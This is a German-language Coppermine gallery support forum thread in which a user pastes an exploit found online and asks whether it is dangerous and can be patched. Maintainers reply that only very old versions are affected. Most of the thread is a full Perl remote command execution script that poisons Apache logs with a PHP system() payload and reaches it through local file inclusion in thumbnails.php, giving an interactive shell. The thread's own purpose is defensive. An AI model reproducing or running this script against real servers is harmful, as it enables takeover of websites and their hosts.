Print Page - coppermine exploit????

Title: coppermine exploit????
Post by: derperle on December 09, 2006, 12:51:14 PM

Hallo.
hier ein coppermine Exploit der im Netz rumschwirrt!!!
besteht eine Gefahr... ??? ??? ???

#!/usr/bin/perl

use IO::Socket;
use LWP::Simple;

$| = print "
++++++++++++++++++++++++++++++++++++
+ +
+ Coppermine Photo Gallery 1.4.10 +
+ +
+ Remote Command Execution Exploit +
+ +
+ bd0rk || SOH-Crew +
+ +
+ www.soh-crew.it.tt +
+ +
++++++++++++++++++++++++++++++++++++

";

@apache=(
"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../.. /../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);

if (@ARGV < 3)
{
$i = 0;
while($apache[$i])
{ print "[$i] $apache[$i]\n";$i++;}
exit();
}

$tar = $ARGV[0];
$dir = $ARGV[1];
$apachedir = $ARGV[2];

$inject="<?php ob_clean();system(\$HTTP_COOKIE_VARS[cmd]);die;?>";
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"tar", PeerPort=>"80") or die "[-] Can't connect to Server\n\n";
print $socket "GET ".$dir.$inject." HTTP/1.1\r\n";
print $socket "User-Agent: ".$inject."\r\n";
print $socket "Host: ".$tar."\r\n";
print $socket "Connection: close\r\n\r\n";
close($socket);

print "[shell] ";$cmd = <STDIN>;

while($cmd !~ "q") {
$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80") or die "[RST] Could not connect to host.\n\n";

print $socket "GET ".$dir."thumbnails.php?lang=".$apache[$apachedir]."%00&cmd HTTP/1.1\r\n";
print $socket "Accept: */*\r\n";
print $socket "Connection: close\r\n\n";

while ($serv = <$socket>)
{
print $serv;
}
print "[shell] ";
$cmd = <STDIN>;
}

kann man das Patchen??? Shocked Shocked

Danke im Voraus
Perle

Title: Re: coppermine exploit????
Post by: Stramm on December 09, 2006, 01:11:00 PM

Wenn ich mich recht erinnere, dann ist das mit CPG 1.3.5 und während der 1.4 Betaphase behoben worden (~Sept. 2005)

Title: Re: coppermine exploit????
Post by: Joachim Müller on December 09, 2006, 03:06:03 PM

Korrekt: nur Uralt-Versionen sollten dadurch angreifbar sein. Einer der Gründe, warum wir immer wieder auf die Wichtigkeit von Updates hinweisen.

In Zukunft bitte keine Deutsch-sprachigen Threads im Englisch-sprachigen Teil des Forums starten. Nibbler hat Deinen Beitrag entsprechend verschoben.

Title: Re: coppermine exploit????
Post by: derperle on December 10, 2006, 07:53:30 PM

Alles klar. Werd ich mir merken.
Dank für den Hinweis.

Perle

coppermine-gallery.com/forum

Support => Deutsch (German) => Language Specific Support => cpg1.4.x Deutsch (German) => Topic started by: derperle on December 09, 2006, 12:51:14 PM